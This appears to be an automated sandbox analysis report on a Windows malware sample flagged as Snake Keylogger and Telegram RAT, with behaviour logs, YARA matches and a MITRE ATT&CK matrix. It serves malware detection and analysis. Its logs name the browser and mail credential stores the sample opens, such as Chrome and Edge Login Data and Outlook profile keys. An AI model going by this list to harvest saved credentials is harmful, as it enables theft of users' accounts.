Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Users\user\AppData\Roaming\uyDicX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Users\user\AppData\Roaming\uyDicX.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\uyDicX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\uyDicX.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: uyDicX.exe PID: 6024, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HBL NO C-ACC-250002.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
HBL NO C-ACC-250002.exe